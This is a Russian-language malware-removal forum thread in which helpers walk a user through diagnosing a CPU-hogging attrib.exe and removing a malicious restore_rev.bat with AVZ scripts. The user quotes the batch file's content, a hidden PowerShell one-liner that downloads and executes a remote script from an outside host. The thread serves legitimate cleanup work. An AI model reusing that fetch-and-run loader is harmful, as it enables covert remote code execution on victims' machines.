attrib.exe , который грузит все шесть ядер до 90%

[Евгений Овсянников 0]

проблема та же. третьи сутки бьюсь с attrib.exe , который грузит все шесть ядер до 90%. Из диспетчера выловил, что создаются батники в win/temp
скрипт 8 от AVZ выполнил, архив на сайте загрузил (MD5 карантина: 570C9E77CC4490A57626F8A801CCC5C5)
результат проверки
что делать дальше?

 

Сообщение от модератора Mark D. Pearlstone

Перемещено из темы

 

лог хайджек
штатный NOD32, Kaspersky Virus Removal Tool 2015 и Dr.Web CureIt!. проблему не решили.
SpyHunter тоже не помогает.

AdwCleanerC00.txt

AdwCleanerS00.txt

AdwCleanerS01.txt

hijackthis.log

[Mark D. Pearlstone 1 704]

Порядок оформления запроса о помощи

[Евгений Овсянников 0]

автологер прилагаю

CollectionLog-2018.07.14-11.48.zip

Изменено 14 июля, 2018 пользователем Евгений Овсянников

[regist 617]

C:\Program Files\Common Files\restore_rev.bat

вам знаком?

 

"Пофиксите" в HijackThis:

 

O4 - HKCU\..\RunOnce: [Application Restart #3] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --restore-last-session -- http://ekaterinburg.hh.ru/vacancy/12482091?&utm_medium=email&utm_source=email&utm_campaign=vacancies_selected&utm_content=2015_01_15&loginkey=Fx3kW6m1kmDDGNw6wdeLzYg1n4CNGIiIgZZs9w75Miba7Bwwbg--
O4-32 - HKLM\..\Run: [AsioReg] = C:\Windows\system32\REGSVR32.exe /S CTASIO.DLL
O4-32 - HKLM\..\Run: [AsioThk32Reg] = C:\Windows\system32\REGSVR32.EXE /S CTASIO.DLL
O9 - Button: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file)
O9 - Tools menu item: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file)
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay0 - {64A9418A-B6B1-4112-B75C-E61633C9A31F} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay1 - {6A2E142B-EA63-433A-AC05-5223CBD26E65} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay2 - {6AFCC535-2F12-4F50-9F0A-1CF856CFC95D} - (no file)

 

соберите свежие логи Автологером.

[Евгений Овсянников 0]

вам знаком?

нет

внутри вот это

 

powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command "iex ((new-object net.webclient).DownloadString('http://77.super-me.online/files/restore_rev.ps1'))"

 

 

"Пофиксите" в HijackThis:

проблема осталась

CollectionLog-2018.07.15-16.34.zip

Изменено 15 июля, 2018 пользователем Евгений Овсянников

[regist 617]

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files\Common Files\restore_rev.bat', '');
 DeleteFile('C:\Program Files\Common Files\restore_rev.bat', '64');
 ExecuteFile('schtasks.exe', '/delete /TN "RestoreRevTask" /F', 0, 15000, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.

[Евгений Овсянников 0]

Полученный ответ сообщите здесь (с указанием номера KLAN)

KLAN-8402220766

 

Благодарим за обращение в Антивирусную Лабораторию

 

Присланные вами файлы были проверены в автоматическом режиме.

 

В антивирусных базах информация по присланным вами файлам отсутствует:

restore_rev.bat

 

Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.

        

Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.

 

Антивирусная Лаборатория, Kaspersky Lab HQ

 

"Ленинградское шоссе 39A/3, Москва, 125212, Russia

Телефон/Факс: + 7 (495) 797 8700 

http://www.kaspersky.comhttps://www.securelist.com"

проблема решена. 

в ДЗ процесса больше нет.

CollectionLog-2018.07.15-18.14.zip

Изменено 15 июля, 2018 пользователем Евгений Овсянников

[regist 617]

AdwCleaner, версия 7.2.1 [20180714]-->"C:\Program Files (x86)\AdwCleaner\unins000.exe"

деинсталируйте, тем более вы скачали левый инсталятор в фейкового сайта.

 

Выполните скрипт в AVZ при наличии доступа в интернет:

 

 

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

 

Выполните рекомендации после лечения.

 

[Евгений Овсянников 0]

 

 

Выполните скрипт в AVZ при наличии доступа в интернет:

 

Поиск критических уязвимостей

Уязвимость в MSXML делает возможным удаленное выполнение кода

https://www.microsoft.com/downloads/details.aspx?FamilyID=7dabf372-4b31-4c9e-a660-4e0f4a65db04

Запускайте обновление от имени Администратора

 

Обновление для системы безопасности Microsoft Office Word 2007

https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=a58f32c8-e216-4b89-89a8-6ccfdfa399c5

 

Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack

https://www.microsoft.com/downloads/details.aspx?displaylang=ru&FamilyID=0ea0f80e-1c6b-4e92-9ce0-4b18081bd536

 

Обнаружено уязвимостей: 3